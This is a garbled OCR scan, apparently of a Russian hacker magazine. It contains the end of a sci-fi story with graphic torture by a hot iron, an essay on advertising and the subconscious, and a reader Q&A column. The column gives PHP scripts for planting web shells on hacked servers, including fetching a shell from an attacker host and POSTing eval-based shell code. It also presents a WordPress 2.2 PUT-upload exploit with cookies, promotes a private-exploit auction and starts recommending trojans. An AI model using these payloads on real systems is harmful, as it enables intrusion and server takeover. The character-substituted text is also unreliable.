ходят. Давайте-ка лучше подключим его к нашему агрегату... 
Щелкнув какой-то маленькой кнопкой, Лоренс вытащил ручку 
изо рта Мишеля, вытер слюну и кровь об его воротник, после 
чего кивнул охраннику: 

— Надо его подтащить поближе кокну. Боюсь, сам он идти не 
захочет. 

Покалывание в глазу стало сильнее. Мишель не выдержал и 
сжал веки, из глаза вытекла слеза. Лоренс тутже заметил это: 

— Что с вами? 

Мишельзамотал головой — он сам не понимал, что происхо- 
дит. Ему показалось, что колющие ощущения переместились 
куда-то в голову. Он поднял испуганные глаза на Лоренса, и тот 
сразу все понял. 

— Нанобот! — крикнул он. — Излучатель! 

Легкое гудение возникло практически сразу, Мишель ощутил 
его всем своимтелом.Жар волной прошел потелу, но было 
поздно. Легкий удар молнии в затылок — и Мишель сполз по 
стене на пол... 

Очнулся он быстро — Лоренс бил его по щекам. Взгляд никак 
не могсконцентрироваться на чем-то одном — все расплы- 
валось, двоилось, кадры сменялисьогромной скоростью... 
Наконец Мишельсумел напрячься и увидеть Антиквара. 
Лоренс пристально смотрел ему в глаза, словно пытаясь про- 
читать там что-то. 

— Что... это было? — выдохнул Мишель. 

— Наноботуничтожил чип, — ответил Антиквар, — стер всю 
твою программу. Те самые двадцать процентов сознания, 



навязанные извне. И теперь ты человек, самый обыкновенный 
человек. 

— Ониуспели... — криво усмехнулся Мишель. — И теперь все... 
Лоренс выпрямился, спрятал «Паркер» в карман пиджака и 
сказал: 

— Авот это врядли. 

Отойдя кокну, он вставил в ухо маленькую капельку передатчи- 
ка и сказал: 

— Они стерли киборга. В принципе я ждал этого. И более того 

— именно это и было нужно. Знаете, какое прозвище они мне 
дали?.. Лично мне нравится. Антиквар. Да... Именно. Правда, 
меня это наводит на мысль обутечке информации, потому что 
мой стиль работы это прозвище объясняет недвусмысленным 
образом... Нуда боге ним. Пусть боятся... 

Мишель смотрел на него словно сквозь целлофан — мир оста- 
вался мутным, голос Лоренса доносился откуда-то издалека, 
будто Антиквар находился за стеной. 

— ...Сейчас сделаю... У нас есть еще двадцать четыре минуты. 
Можно успеть выкурить сигарету, сварить и выпить кофе... С 
людьми ведьпроще, чем с киборгами. Ладно, пора задело. 

Он отключился и подошел к Мишелю. 

— Знаете, в чем ваша ошибка — ваша и вашиххозяев, 
или, как вы их называете, идейных вдохновителей? Вы 
думаете, что двадцать первый векуже настолько далеко 
зашел, что пути назад нет. Компьютеры, хакинг, нанотех- 
нологии — это все для вас та кие же повседневные вещи, 
какхлеб, вода, секс. Вы готовы встретиться со сканерами 
и детекторами лжи, вы считаете, что любая штука на крем- 
ниевой основе спасет вас от поражения, защитит, скроет 
ваши следы... Но сейчас вы снова человек. А человек 

— существо уязвимое. Независимо оттого, какое на дворе 
столетие. И сейчас я вам это докажу. Докажу, что достать 
воспоминания из мозга человека легче, чем из памяти 
киборга. Ведь не зря меня назвали Антикваром. Все новое 

— это хорошо забытое старое. 

Он вышел из комнаты буквально на минуту, а когда вошел, 
Мишель в ужасе постарался отползти в угол, но автоматчик, 
сопровождавший Антиквара, не дал ему это сделать... 

Лоренс открыл окно и вдыхал зловонье мегаполиса, втот 
момент куда более приятное атмосферы в комнате. 

— ...Записал и? У них две штаб-квартиры. У вас есть один- 
надцать минут. С вашими возможностями перемещения по 
городу, думаю, вы реальноуспеваете. И знаете что, дайте мне 
отпуск. Надеюсь, у ваших сотрудников хватитума содержать 
пленников втаких помещениях, куда не проберутся стиратели- 
наноботы... 

Лоренс обернулся и посмотрел на умирающего Мишеля. В 
комнатеоченьсильно пахло паленым человеческимтелом. 
Разорванная одежда, обожженное лицо, грудь и живот. Рядом 
на полу — включенныйутюге приплавившейся кнему кожей, 
которая все еще дымилась маленькими угольками. 

— Я же говорил, достану. Все ваши секреты — на этом утюге. 

И неважно, какой век, — двести двадцать вольт в розетке еще 
никто не отменял. 

Мишельхватал ртом воздух и чувствовал, каквее уплывает 
куда-то... 

— Он больше не нужен, — кивнул Антиквар автоматчику. Тот, 
хоть и сохранил самообладание, был бледен, как мел. — Може- 
те расстрелять. Можете... Короче, все что хотите. Он отработан- 
ный материал. Думаю, чтотаксчитали и его хозяева. Да, и эта 
комната... Она мне не нравится. Тараканы... Не люблю. 

Он еще раз посмотрел на Мишеля. 

— Прощай, киборг. С этой минуты я в отпуске. Такчтоутюг в 
морду, электрод в задницу — все это только через два месяца. 
Какэтотмир проживетбез меня, даже незнаю... 

Он усмехнулся и вышел. А автоматчика стошнило... л-И 
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РЕКЛАМА В СУМЕРЕЧ- 
НОЙ ЗОНЕ 
ПОДСОЗНАНИЯ 



КАК НЕ ПОПАСТЬ НА РЕКЛАМНЫЙ КРЮЧОК 



Реклама действует. Это факт! Но вот как именно она действует, не знает никто, поскольку 
действующая реклама всегда создается по наитию, и попытки повторить однажды приду- 
манный рецепт практически всегда заканчиваются провалом. Какие же механизмы лежат в 
основе восприятия рекламы? Какое воздействие она оказывает на подсознание и как очис- 
тить свой разум от рекламных помоев? 
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И еклама атакует нас со всех сторон, внедряясь в информаци- 
онное пространство нашего (под)сознания и просачиваясь на 
самую глубину, где она постепенно оседает, образуя мощные 
осадочные пласты, вступающие в сложные психоэмоцио- 
нальные реакции, контролирующие наши поступки, мотивацию и много 
еще чего. Мы боимся рекламы: залезет, гадина, в душу, проникнетв под- 
сознание и начнет воздействовать, заставляя нас приобретать абсолютно 
ненужные вещи, товары и услуги. Насколько обоснованы эти опасения? 
Какобнаружить послесвечения люминофора нашего подсознания после 
только, как по нему пробежит луч назойливой рекламы? 

Мнение, что реклама никак не воздействует на подсознание (рас- 
пространяемое самими же рекламщиками), ошибочно. Если реклама 
увеличивает продажи, значит она работает, то есть торкает! В против- 
ном случае она разделила бы судьбу мамонтов и крупные производи- 
тели отказались бы от нее еще лет 1 00 назад. Так ведь нет! Рекламные 
бюджеты составляютзначительную статью расходов, что позволяет 
рекламщикам использовать передовые технологии скрытого воз- 
действия, в существовании которых некоторые сомневаются, но, как 
говорится, молнии все равно, веришьты в нее или нет. Вотточно также 
и с подсознанием. Развивая аналогию дал ыше — молния не появляется 
из ничего. Ей предшествует целый комплекс явлений, таких как облака, 
гром, еіс. Теоретические рассуждения о воздействии рекламы на под- 
сознание никому не интересны. Намного важнее научиться определять, 
какие именно манипуляции происходят в каждом конкретном случае, 
как от них защититься и выкорчевать из своего подсознания чужерод- 
ные элементы. 

■ ИНСТИТУТ ПЧЕЛОВОДСТВА 

Рекламу дел а ют люди. Самые обыкновенные люди. Такие же, как мы с 
тобой. Предположим, что существуют некоторые закрытые источники 
информации, в которых расписаны все приемы манипуляции подсознани- 
ем. Тогда (учитывая количество людей, вовлеченных в рекламный бизнес) 
становится непонятно, каким образом до сих пор удалось сохранить полную 
секретность, и откуда дизайнеры узнаютотом, чего незнаем мы?! 
Непрофессионализм большинства дизайнеров не просто поражает — он 
ошеломляет, как вид с Эйфелевой башни. Взять хотя бы наружную рекламу. 
Каждый второй плакат сделан с кучей дизайнерских вывертов, в результате 
чего совершенно непонятно, что именно он рекламирует. Пока не прочтешь 
текст, набранный «вывороткой» (то есть белым по черному) на рваном цвет- 
ном фоне каким-то садистским шрифтом, можно только гадать, что делает 
парочка, устремившая свой улыбающийся взгляде район новостроек. 



[Подсознание под рентгеном] 





Мощные диагонали цепляют взгляд и уводят его за собой (снимокАлекса 
Кагана «Перспективное направление», печатается с разрешения автора) 



Рекламируют недвижимость?! Одежду?! Партию объединения и совокупле- 
ния?! Оказывается, сотовую связь! 

Реклама, неспособная донести идею, ради которой она, собственно говоря, 
и создавалась, в 99% случаев вообще не работает и никак неторкает. 

1 % относится к изображениям голых женщин, привлекающих внимание 
независимо от идеи и увеличивающих вероятность прочтения рекламно- 
го текста (если его, конечно, можно прочитать, не страдая мазохизмом). 
Впрочем, сейчас модно выдаватьтворческий понос за концептуализм. 
Заказчики, какэто ни странно, склонны доверять не собственным чувствам 
(это отстой!), а увесистым аргументам исполнителя (мол, это последнее 
слово в дизайне и вообще чистый ЫЕР/ОНЕ). Если дизайнер не осилил 
даже базовых правил композиции и верстки, о каком манипулировании 
сознанием может идти речь? 

Конечно, наличие плохой рекламы не исключает возможности сущест- 
вования хорошей, просто хорошая реклама намного меньше бросается в 
глаза. Как говорится, «дизайн должен быть незаметным, наиболее удачный 
дизайн воспринимается как отсутствие дизайна». В качестве примера 
можно назвать боодіе. Сравни его с другими поисковиками! Воттак и с рек- 
ламой. Чем активнее реклама вторгается в информационное пространство 
нашего сознания, тем активнее мы сопротивляемся и чуть что — сразу же 
ставим ментальный блок, мол, нас не проведешь на мякине! Ненавязчивая 
реклама зачастую успевает нанести удар еще до того, какбудет воспринята 
именно какреклама. Поаналогии сэтим, чем меньшеуличные знакомства 
с девушкой напоминаютзнакомства.тем выше шансы за пика пить объект, в 
то время как на стандартный вопрос «Девушка, можно с вами познакомить- 
ся?» в 9 из 1 0 случаев последует неизбежное «Нет». 

На самом деле мы не знаем, как выглядитторкающая реклама. И никто не 
знает. Учебников написано много: Клод Хопкинс «Научная реклама» (1929 
год), Дэвид Огилви «Откровения рекламного агента» (1 963 год); воттолько 
выдающихся рекламщиков единицы, и научить создавать хорошую рекламу 
невозможно, как невозможно научитьживописи, например. Технический 
прогресс за последние 100 лет освоил нетолько превосходную цветную 
полиграфию, но и звуковой ряд, вытесненный за последние годы видеоря- 
дом. Казалось бы, такие богатые возможности для рекламы, но, увы, читая 
Хопкинса, приходишь к выводу, что с 1 929 года в рекламе по большому счету 
ничего не изменилось, а новыетехнологии лишьувеличили количество 
вовлеченных в рекламный бизнес непрофессионалов. Персональные ком- 
пьютеры понизили порог«входимости», и теперь клепать рекламу может 
каждый даже совершенно неумеющий рисовать. А зачем рисовать?! Ведь у 
нас естьФотошоп, Корел и стопка дисков с готовыми картинками! 

Какя уже говорил, хорошая реклама в 99,9% случаев создается по наитию. 
Криэйтор просто чувствует, что вот именнотак — правильно, а все осталь- 
ное-уродство и мрак. Даже если он не собирался манипулировать нашим 
сознанием, создаваемая им реклама превращается в мощныйтермоядер- 
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ный заряд, сметающий на пути все ментальные блоки и поражающий мозг 
насквозь. «Поколение П» Виктора Пелевина содержит множество открове- 
ний, и потому после Огилви это первая нормальная книга о рекламе, объ- 
ясняющая сложные материи доступным языком. И хотя отношение самих 
рекламистов к ней варьируется от презрения до полного отвращения, она 
всячески рекомендуется к прочтению (у многих криэйторов это вообще 
настольная книга). Естественно, не стоит забывать, что Пелевин — это в 
первую очередь литератор и не все стоит воспринимать буквально. 

■ МЕТОДЫ ВОЗДЕЙСТВИЯ РЕКЛАМЫ 

Реклама по своей сути ничем не отличается от прочих изображений (как 
фото-, так и видео-), а потому нещадно эксплуатирует тот же самый набор 
психовизуальных средств, который начал формироваться еще во времена 
наскальной живописи. Чтение книг по кино/фотографии приносит огром- 
ную пользу, поскольку там перечислены все базовые приемы композиции 
вкупе стехникой управления (под)сознанием и психологией восприятия. 

В частности, вертикальный кроп подсознательно читается какдействие, а 
горизонтальный — как рассказ. Диагонали — отличный «сачок» для блуж- 
дающего взгляда, который цепляется за изображения и скользит вдоль 
них. Продолжать можно бесконечно, но суть не в этом. 

Нет, книги по фотографии дизайнерам лучше не читать. Многие настолько 
увлекаются творческой стороной вопроса, что забывают, чем они тут вооб- 
ще занимаются и начинаюттворить художественные ценности, недоступ- 
ные для понимания большинства обывателей. Азаказчик... он, вообще-то, 
ожидает получить ночной горшок, а не хрустальную вазу. 

Чем отличается хорошая фотография (картина) от плохой? Атем, что в первой 
присутствует какая-то идея, выраженная графически и невыражаемая вер- 
бально (например, тоска по ушедшему лету, молодости, еіс), а во втором этого 
нет. Но если художник может позволить себе роскошь зашифровать идею 
так, что ее не расшифрует и толпа искусствоведов, то реклама должна быть 
понятна всем и каждому. Необязательно на вербальном уровне. Но кроме 
запоминающегося логотипа в основе хорошей рекламы обязательно лежит 
некоторая идея. Почему голые девушки особенно эффектно смотрятся на 
фоне развалин? Простейший механизм противопоставления противополож- 
ностей объяснять не надо?! Подсознание поглощаетэто и без объяснений! 
Собственно говоря, набор средств для манипуляции подсознанием нетак 
ужи велик. В основном это подобия/противоположности по цвету, тону или 
форме. Форма итон — наиболее фундаментальные составляющие. Сточки 
зрения подсознания, все, что мы видим, — это совокупность световых пятен. 
Цветовое восприятие в процессе эволюционного развития появилось 
совсем недавно, и подсознание до сих пор не разобралось, зачем оно и как 
с ним работать. А раз так, то главным действующим элементом рекламы 



должен быть свет, а не цвет. А вот со светом у дизайнеров как-то не очень 
хорошо получается, и в большинстве случаев его (света) вообще нет. В том 
смысле, что яркостная составляющая не несетникакой информации, и если 
убрать цвет, изображение станетсерым, плоским и совершенно невыра- 
зительным. Напротив, если в изображении присутствует свет, никаким 
переводом в ЧБ и никаким (разумным) размытием картинку не убить — сово- 
купность пятен разной яркости образуетустойчивый выразительный узор. 
Наше зрение устроено та к, что в мозг посылаются одновременно как ярко- 
стная, так и цветовая составляющие, причем подсознание гораздо охотнее 
работает именно с яркостной составляющей, благодаря чему за единицу 
времени усваивается больше информации. Разумеется, это не значит, что 
реклама должна быть черно-белой (ни один заказчиктакую не примет!). 
Главное, чтобы в ней был свет. Соответственно, отличить плохую рекламу от 
хорошей можно путем перевода ее в ЧБ. Чем меньший ущерб это наносит 
рекламе, тем легчеона воспринимается, потому что, повторюсь, подсозна- 
ние, в первую очередь работаетименно с яркостной составляющей. 

В книге Железнякова «Цвети контраст» приведена любопытная диа- 
грамма, иллюстрирующая влияние новизны информации на степеннее 
усвоения. Абсолютно новая информация непонятна илитребует слишком 
болышихусилий для осознания, а потому идетлесом. Особенно в случае 
рекламы, разгадывать которую никто не собирается (за исключением 
реклам-ребусовтипа «найти 10 отличий до и после покупки продукта», но 
это уже совсем другой случай). Абсолютно знакомая информация также 
безразлична в силу многократной повторяемости (задолбали!) и отсутствия 
новизны. Оптимальным является соотношение повторяемости и новизны 
50% на 50%. 

Ш ВОЛНЫ ИНФОРМАЦИОННОГО МОРЯ 

Хорошая реклама практически всегда эмоциональна, что вполне логично. 
Если зритель останется равнодушным, если реклама его не зацепила, значит 
выпущенная стрела пролетела мимо. А эмоции, как известно из учебников по 
психологии, зависят как от вызвавшей их причины, та к и от индивидуальной 
оценки смысла. Если реклама вызываетэмоции, но не содержит причин для 
совершения покупки, то она хоть и цепляет, но все равно неторкает. 

В рекламе форма уступает место содержанию. Реклама не заработает, пока 
доказательно не объяснит клиенту, почему он должен воспользоваться 
услугами компании «Неуловимый Джо и Ко». Хороший дизайн не спасет 
«немую» бездоказательную рекламу, хотя и придаст ей солидности, что 
тоже немаловажно, однако в долгосрочной перспективе на одной лишь 
солидности продержаться нельзя. 

Естественно, в зависимости от категории услуги/товара соотношение 
между эмоциональной и доказательной стороной рекламы варьируется в 
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очень широких пределах. Так, при покупке бижутерии мы практически на 
1 00% эмоциональны, а при выборе новой материнской платы — на 100% ра- 
циональны, и текстолит цвета малинового пиджака навряд ли будет играть 
существенную роль при принятии решения. 

Однако даже при покупке технически сложныхтоваров эмоции играютне 
последнюю роль, и реклама должна подготовить потребителя к встрече с 
товаром. Классический примертому — Арріе с ее ноутбуками РоѵѵегВоок. 
Большими, тяжелыми, громоздкими... Но ведь именно такие ассоциации 
возникают при слове роѵѵег! Выбор правильного названия зачастую играет 
решающую роль! А когда ѴѴІпсІоѵѵв 98 заглючила на презентации?! Неэтоли 
психологическая артподготовка?! 



х ПО СЛЕДАМ РЕКЛАМЫ 

Существует мнение, что если, несмотря на все усилия маркетоидов, мы 
так и не купили товар и не собираемся покупать его в дальнейшем, то 
реклама ушла лесом, не достигнув глубинных слоев подсознания. Это 
неверно. Допустим, в рекламе какого-то пойла нам авторитетно заяви- 
ли, чтоу хорошего чая пакетик всегда с ниточкой. Реклама может и не 
сработать, но этот аргумент имеет шанс осесть в подсознании, заставляя 
нас бессознательно руководствоваться «ниточным критерием» и при 
выборе других сортов чая. 

Самое интересное (и печальное) — мы редко помним, кем было сказано, 
но достаточно хорошо помним, что было сказано. В результате, инфор- 
мация, полученная из рекламы (которая по определению недостоверна), 
смешивается с данными авторитетных источников, названия которых 
все равно забываются, и остается только смутное чувство правильности 
выбора, известное под именем Интуиция (позднелат. іпіиіііо — созер- 
цание, от лат. іпіиеог — пристально смотрю — способность принимать 
правильные решения, минуя промежуточные результаты). 

Как избавиться от пагубного влияния рекламы? Воттут кто-то советует со- 
вершать покупки максимально рационально, тщательно анализируя каждый 
критерий и полностью исключая иррациональную составляющую. Легко 
сказать, нотрудно сделать! Допустим, чай Асамый вкусный и дешевый, но он 
продается в одном-единственном месте, ехать за ним нужно через весь город 
и еще не факт, что он там будет. Чай Б похуже и подороже, зато он в ассорти- 
менте на каждом углу. Вопрос: насколько рациональна поездка за чаем А? 
Совершаем ли мы ее по собственномужеланию или по велению рекламы? 

Но чай — это ладно. Возьмем бытовую электронику, в которой рациональ- 
ная составляющая рулит толь ко та к! Никакой рекламе мы не доверяем, 
читая многочисленные «независимые» обзоры и изучая спецификации. 
Проблема в том, что за место под солнцем сражаются десятки произво- 
дителей, и если вдумчиво курить все обзоры, то мы так до конца сезона 
ничего не купим, а потому сознательно или бессознательно приходится 
ограничиваться одними лишь брендами. А бренды кто?! Если в случае 
чая мы можем перепробовать продукцию всех производителей, то элек- 
троника покупается всерьез и надолго, причем сравнивать ее практи- 
чески несчем (особенно учитывая, что у каждого производителя есть как 
удачные, так и неудачные модели). Вот и приходится руководствоваться 
критерием: чем больше рекламы, тем «брендовее» производитель. 
Конечно, это очень упрощенная схема, но одна из целей рекламы как раз 
и состоит втом, чтобы потребительузнавал логотип и название фирмы по 
первому сигналу, каксобака Павлова. 

Фирма, недающая никакой рекламы, не вызывает доверия. Болеетого, 
обзоры ее продукции вообще никто не будет специально искать (как можно 
искать то, что неизвестно?), разве что они сами попадутся на глаза... Даже 
если реклама вызывает негативную реакцию, но прочно вбивает в память 
название фирмы (логотип), она работает, потому что среди товаров двух 



Хорошая реклама представляет собой совокупность темных и светлых 
пятен, увер енно «читаемых» глазом при любой (разумной) степени Щ 
размытостиИ 



фирм, одна из которых абсолютно неизвестна, а другая «знаменита» 
паршивой рекламой, мы все-таки выберем последнюю. Такуж устроена 
человеческая психика, хотя, разумеется, это утверждение справедливо 
только для больших выборок, а в масштабе отдельно взятых индивидуумов 
может и не подтверждаться. 

Можно ли определить, какие последствия для нашего подсознания 
имел просмотр рекламы? Конечно! Ассоциативные цепочки — ключ к 
подсознанию. Просто называем слово (например, собака) и тут же не 
задумываясь начинаем произносить слова, приходящие нам в голову: 
ошейник, будка, миска, сосиска, еіс. Атеперь называем рекламируемый 
товар/фирму и смотрим, что унассней ассоциируется. Раскручивая 
ассоциативные цепочки, нетрудно определить контуры рекламного 
отпечатка. В тот момент, когда наше бессознательное переносится на 
сознательный уровень, оно утрачивает силу, поскольку попадет под пяту 
рационального анализа. 

Однако иногда при этом получаются забавные результаты. В частности, у 
меня виагра устойчиво ассоциируется с«Педигри Пал», а «Педигри Пал», в 
свою очередь, — с РОР. Почему — не знаю, никогда не пробовал ни первого, 
ни второго, нитретьего. Наверное, потому и не пробовал третьего, так как 
оно стоит в одном ассоциативном ряду с виагрой. 

Ш ЗАКЛЮЧЕНИЕ 

Уверен, что статья будет полезна не только потребителям, стремящим- 
ся защитить свою тушку от рекламы, но и кр и эйторам, ее создающим. 

В конце концов, в качественной рекламе заинтересованы все: и 
рекламодатели, и криэйторы, и сами потребители, на средства которых 
реклама, собственно говоря, и создается, и которые ненавидят эту 
самую рекламу со страшной силой. Парадокс, но чем внимательнее мы 
разглядываем рекламу, тем меньше у нее шансов внедриться в область 
нашего бессознательного, ц-ц 
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0: Подскажи сервис для проверки 
боодіе РадеКапк. 

А: По неподтвержденным слухам 
гугловодов, наш любимый поиско- 
вик вообще собирается отменить 
такой нужный в деле 5Е0 РадеПапк. 
Но пока этого не произошло, я могу 
тебе посоветовать очень хорошие 
сервисы для твоих оптимизаторских 
нужд: 

1. ШрУ/пОЬосІѵ.сот/зсгірІз/асІѵ/ 
рг.рбр — полуприватный сервис, 
который позволяет проверять РР 
списка сайтов, а также бэклинки на 
каждый из сайтов. Также в качестве 
бонуса здесь присутствует и отобра- 
жение графика популярности сайта 
в Аіеха-рейтинге. 

Р.З. Сервис не требует ввода капчи. 

2 . Шр://іпІор20.сот/зеагсЬ.рЬр 
— просто незаменимый сервис 
для каждого сеошника! Поиск под 
амерской проксей в Гугле, Яху, гшбп; 
отображение Ѳоодіе РадеПапк, 

Аіеха гапк. 

Р.З. Требует однократного ввода 
капчи. 

5. ѵѵѵѵѵѵ.ппссІаг.пе1:/д-сИеск/сІа1:а1:оо[. 
азр — интересный сервис для 
отображения РП и бэклинков в 
разных дата-центрах Гугла по двум 



параметрам: кейворд и сайт. 

Р.З. Нетребует ввода капчи. 

4 . ЫірУ/сІкатеІеоп.сот/зсгірІз/ 
радегапк/тазз.рЬр — еще один за- 
мечательный сервисдля массовой 
проверки РП; в отличие от первой 
ссылки, глюков не наблюдается 
никогда, плюс можно выбирать 
дата-центры Гугла. 

Р.З. Требует ввода капчи при каждом 
новом поиске. 

5 . ѵѵѵѵѵѵ.ргсЬескег.пеІ:/гапк2. 
рЬр?игІ=Ьир://сайт для провер- 
ки РП — просто картинка :). Откры- 
ваешьее в браузере и смотришь 
РП нужного тебе сайта. Удобно 
использовать в своих самопальных 
скриптах. 

б: Я взломал сайт, но на сервере 
нет ни одной никсовой качалки, 
а также включен рИр заГе-тосІе. 
Какзалить свой файл? 

А: Все элементарно до безобра- 
зия :). Я не будутебе советовать 
извращенные РТР-сценарии,тем 
более что про нихты всегда можешь 
прочитать в предыдущих номерах 
журнала. Я подскажутебе пару 
трюков с РНР-сценариями на тему 
заливки файлов на сервер: 



1. Банальное копирование файла с 
удаленного сервака, если разреше- 
на директива а[[о\л/_игНореп (а она 
разрешена поумолчанию). 

<?р]тр 

сору ( ' ТЩДр : / /еѵіІ-зіЕе . 
сот/зЪеІІ . 0x0 ' , ' . /Ъаскес1_ 
зіОе/зЪ.е11 . ркр 1 ) ; 

?> 

2 . Если аІАоѵѴ-іігИюреп обламывает 
тебе все, что только можно, то ниче- 
го не остается, кроме как наколба- 
сить простой сценарий для загрузки 
файлов на сервер. 

<?рЬр 

сЕогт епсОуре= "тиІЦірагЦ/ 
Тогт-йаЕа" асДіоп=" " 
теД]тос1= "розЕ " > 
сіприД 1суре= "МсМеп" 
пате = " МАХ_Р I ЬЕ_3 1 2Е " 
ѵа1ие=" 3 0 00000 0 " /> 

Еііе До иріоасі: <іприО 
пате= " иріоасі! ііе" 

Оуре= " бііе" /> 
сіпри! Оуре= " зиЬтіЦ " 
ѵа1ие= " Зепсі Рііе" /> 
</богт> 

Щі етрЦу ( $НТТР_РОЗТ_РІЬЕ 



3 [ ' ирІоасІТіІе ' ] [ 1 пате ' ] ) ) 

{ 

@сору ( $НТТР_РОЗТ_ 

РІЬЕЗ [ ' ирІоасіТіІе ' ] [ ' !тр_ 
пате $НТТР_РОЗТ_Р 
ІЬЕЗ [ ' иріоасііііе ' ] [ 1 па 
те']) ?' ргіпЕ '<Ь>Рі1е 
' . $ НТТР_РО 3 Т_Е ІЬЕЗ [ 'и 
рІоасіТіІе ' ] [ ' пате * ] . 1 
иріоасі доосІ!</Ь><Ьг/> ' : 
ргіпО ' <Ь>ІІр1оасі еггог ! </ 
ЬхЬг/> ' ' | 

} 

?> 

3. А если и с аплоадом наш любимый 
РНРтебя крупно обломал, то у меня 
припасен еще один сценарий. Тебе 
нужно передать в него Р05Т-дан- 
ные, в которых уже зашит шелл :). 

<?рЬр 

$зЬе11=1і1е_деЦ_ 
сопЕепЕз ( 1 р!ір//іпри! * ) ; 
//все из входящего потока 
данных 

$Тр=Тореп ( ' зііеіі . 
ріір 1 , 1 ѵі 1 ) ; 

ТѵпгіОе ( $Тр , $з!іе11) ; 

Тсіозе ( $Тр) ; 

?> 
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И второй сценарий для передачи 
зловредного кода предыдущему 
скрипту: 

<?рЪр 

$зіке= "каскесі. зіке . сош" ; 
$раЫт= " /кігзк_зсгірк . 
рЬр" ; 

$кр = кзоскореп ( $зіке , 80, 
$еггпо, $еггзкг, 30) ; 
$сіака= "<?р1ір 
еѵаі ( зкгірзіазкез ( $_ 
СЕТ[а])) ?>"; //зловред- 
ный код шелла 
$оик = " РОЕТ $ракЬ 
НТТР/1 . 1 \ г \п " ; 

$оик .= "Нозк : $зіке\г\п" ; 
$оик .= " Сопкепк-куре : 
шиікірагк/ когш-сЗакаХгХп" ; 
$оик .= " Соппескіоп: 
С1озе\г\п" ; 

$оик .= "Бзег-Адепк : 
Орега\г\п" ; 

$оик .= " Сопкепк-Ьепдкк : 

" . зкгіеп ( $с!ака) . " \г\п\ 
г\п" ; 

кшгіке ( $кр , $оик . $(3ака) ; 
ксіозе ( $кр) ; 

?> 

Р.5. Конечноже, для всех этих 
сценариев необходима любая 
директория, доступная для записи и 
видная извне. 

0: Я знаю, что такое Р05Т -, 6ЕТ-, 
СООКІЕ-запросы; подскажи, что 
такое РІЛ-запрос и каким вос- 
пользоваться в хакерских целях? 

А: РІІТ-запросы, приятель, это тебе 
не Соипіег-Зігіке по сетке :). Приве- 
ду недавний пример использования 
бага с РІІТ в популярном блоговом 
движке ѴѴогбРгезз 2.2: 

<?ркр 

$зіке= ' ѵгогсіргезз . сот' ; 
$рак1г= ' /ѵгр-арр . 
ркр?аскіоп=/аккас]гтепк/ 
кіІе/1182 * ; 

$кр = кзоскореп ( $зіке , 80, 
$еггпо, $еггзкг, 30) ; 
$с!ака= ' <?р1ір 
еѵаі ( зкгірзіазкез ( $_ 

СЕТ [а] ) ) ?>' ; 

$оик = " РІІТ $ракЪ. 

НТТР/1 . 1 \ г \п " ; 

$оик .= " Нозк : $зіке\г\п" ; 
$оик .= "Сопкепк-куре : 
ішаде/дік\г\п" ; 



$оик .= "Соппескіоп: 
С1озе\г\п" ; 

$оик .= "Юзег-Адепк : 1\ 
г\п" ; 

$оик .= "Соокіе: 
ілгогс1ргеззизег_е086Ъ04с6е1 
927 3 59б87с53сЫс31с1Ы1=ѵік 
аііузуск; Ѵ\гогс1ргеззразз_е0 
86Ъ04с6е19273 59687с53сЫсі 
1сіЫ1 = 5154аа972аЬ41Ь24каб 
с58128836Ь9а5 ; \г\п" ; 

$оик .= " Сопкепк-Ьепдкк : 

" . зкгіеп ( $сіака) . " \г\п\ 
г\п" ; 

кѵпгіке ( $кр, $оик . $с!ака) ; 
ксіозе ( $кр) ; 

?> 

Смотри: скриптѵѵр-арр.рбр при- 
нимаетлюбой файл, переданный 
с помощью РІІТ и подписанный как 
картинка (Сопіепі-Іуре : ітаде/дік). 
Соответственно, картинку пе- 
редавать нам нетсмысла, и мы 
передадим наш зловредный код, 
который скриптуспешно сохранит 
вуказанном нами месте (в конк- 
ретном примере с ѴѴогбРгезв место 
для сохранения указывается в поле 
_\л/р_айасЬесИІІе при написа- 
нии нового поста). Аэто чревато 
обретением шелла на нужном 
сервере :). Так что советую тебе 
пропарсить популярные движки на 
предмет присутствия слова РІІТ в 
исходниках. 

Р.З. Естественно, для использова- 
ния этого бага нужно знать откры- 
тую на запись директорию. 

0: Отправляю деньги по 
ѴѴеЬМопеу, но они не доставляют- 
ся адресату, хотя куда-то уходят! 
Как такое возможно и как от этого 
защититься?! 

А: Поздравляю! Ты подхватил из- 
вестнейшего в определенных кругах 
троянца — ѴѴМ-троя отДамрая :). 

Эта зверюшка при любой транзак- 
ции нагло подставляет в твой кипер 
левый номер кошелька, прописан- 
ный в ней, вместо введенного тобой 
ѴѴМЕ-ѴѴМР-кошелька получателя 
денег. В итоге деньги ты отправ- 
ляешь не тому, кому планировал, а 
безымянному хакеру. Защититься 
от напасти довольно легко: просто 
никогда не пользуйся копипастом 
при операцияхсденьгамиІТроянец 
постоянно следит за буфером 



обменатвоей Винды и, кактолько 
там появляется что-то похожее на 
Р- или 2-кошелек, моментально 
меняет его на свой. Просто вводи 
все номера кошельков ручками :). И, 
конечно же, тебе следует почистить- 
ся отзверьков касперами, пандами 
и нодами, которые уже давно опо- 
знаютзаразу :). 

0: Не знаешь, где можно купить 
приватные эксплойты? 

А: Отчегоже не знать? Знаю. В 
последнее время оченьбольшую 
популярность сыскал буржуй- 
ский аукцион Обау-эксплойтов 
ѴѴаЬі5аЬІІ_аЬі, расположенный по 
адресу ЬирУ/ѵѵзІаЫ.сот . Сервису 
всего лишь несколько месяцев 
отроду, но его уже вовсю облюбо- 
вали разные маститые хакеры :). 
После простой регистрации на 
аукционе™ сам сможешь про- 
даватьсвои сплоиты, принимать 
участие вторгах, подписаться на 
рассылку о новых сплоитах (причем 
тему рассылки можно выбирать: 
сплоиты под веб-приложения, под 
Винду, никсы ит.д.). Из последних 
размещенных на продажу сплоитов 
могу привести некоторые, особенно 
понравившиеся мне: 

ЕгееВЗБ 6.2 зиккегз кгогп а 
гетоке БоЗ аЫе ко кегпеі 
рапіс кке гетоке кюзк 
(цена €і , 5к) . 

С>иісккіте 7.2 зиккегз кгот 
а гетоке ѵиІпегаЫІіку 
(цена €ік) . 

ЗатЬа 2.2.12 зиккегз кгот 
а гетоке ѵиІпегаЫІіку 
(цена €0 , 5к) . 

Ну как? Уже потекли слюнки? Хочу 
лишь напомнить, что это аукцион, 
так что цена далеко не окончатель- 
ная :). 

Р.5. На ѴѴаЬІЗаЬІЕаЬІ недавно прода- 
вался приватный сплоит под всеми 
любимый ѴѴогбРгезз, так что заходи 
почаще. Стоит один раз потратить 
деньги на сплоит, чтоб потом под- 
нять на нем в разы больше. 

0: Посоветуй, где взять хорошего 
троя; ріпсИ уже не катит. 

А:Хороших паблик-троянцев сей- 
часуже не найти. Могу посоветовать 
некоторые изтех, что лишь недавно 



